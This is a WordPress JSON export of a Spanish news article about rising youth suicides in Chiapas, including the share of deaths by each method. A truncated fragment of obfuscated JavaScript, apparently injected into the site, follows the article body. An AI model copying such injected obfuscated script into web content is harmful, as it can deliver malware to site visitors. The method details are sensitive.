{"id":24013,"date":"2025-09-16T04:49:47","date_gmt":"2025-09-16T04:49:47","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=24013"},"modified":"2025-09-16T04:49:48","modified_gmt":"2025-09-16T04:49:48","slug":"senalan-incremento-de-suicidios-en-la-entidad","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=24013","title":{"rendered":"Se\u00f1alan incremento de suicidios en la entidad"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000335878-1024x576.jpg\" alt=\"\" class=\"wp-image-24014\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000335878-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000335878-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000335878-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000335878.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Carlos Luna.<\/p>\n\n\n\n<p>15 de septiembre del 2025. Tuxtla Guti\u00e9rrez.- El Fiscal General del Estado de Chiapas, Jorge Luis Llaven Abarca, alert\u00f3 sobre un preocupante aumento en las cifras de suicidio en el sector m\u00e1s joven de la poblaci\u00f3n, lo que encendi\u00f3 un foco de alarma para las autoridades y la sociedad chiapaneca.<br>De acuerdo con las estad\u00edsticas de la Fiscal\u00eda General del Estado (FGE), entre enero y agosto de este a\u00f1o se han registrado 19 suicidios en el grupo de ni\u00f1as, ni\u00f1os y adolescentes. La distribuci\u00f3n por g\u00e9nero es casi equitativa, con un 52% de casos correspondientes a mujeres y un 48% a hombres.<br>Este panorama contrasta marcadamente con las cifras de la poblaci\u00f3n adulta, donde la incidencia se mantiene estable en comparaci\u00f3n con el a\u00f1o anterior, registr\u00e1ndose aproximadamente 170 casos, de los cuales el 85% son hombres.<br>\u201cEs un tema que, sin duda, nos llama a la reflexi\u00f3n y al an\u00e1lisis; es muy vigente en todas las sociedades. La conducta humana cuando se atenta contra la propia vida es un asunto que, en el caso de Chiapas, estamos viendo con preocupaci\u00f3n en estos casos\u201d, expres\u00f3 Llaven Abarca.<br>Las investigaciones de la FGE indican que la mayor\u00eda de estos casos en j\u00f3venes est\u00e1n asociados a padecimientos de depresi\u00f3n y al consumo de sustancias nocivas.<br>Respecto al m\u00e9todo, el 80% de las v\u00edctimas opt\u00f3 por la asfixia por ahorcamiento, seguido en segundo lugar por la ingesta de sustancias t\u00f3xicas.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Carlos Luna. 15 de septiembre del 2025. Tuxtla Guti\u00e9rrez.- El Fiscal General del Estado de Chiapas, Jorge Luis Llaven Abarca, alert\u00f3 sobre un preocupante aumento en las cifras de suicidio en el sector m\u00e1s joven de la poblaci\u00f3n, lo que encendi\u00f3 un foco de alarma para las autoridades y la sociedad chiapaneca.De acuerdo con las &hellip;<\/p>\n","protected":false},"author":2,"featured_media":24014,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-24013","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24013","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=24013"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24013\/revisions"}],"predecessor-version":[{"id":24015,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24013\/revisions\/24015"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/24014"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=24013"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=24013"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=24013"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}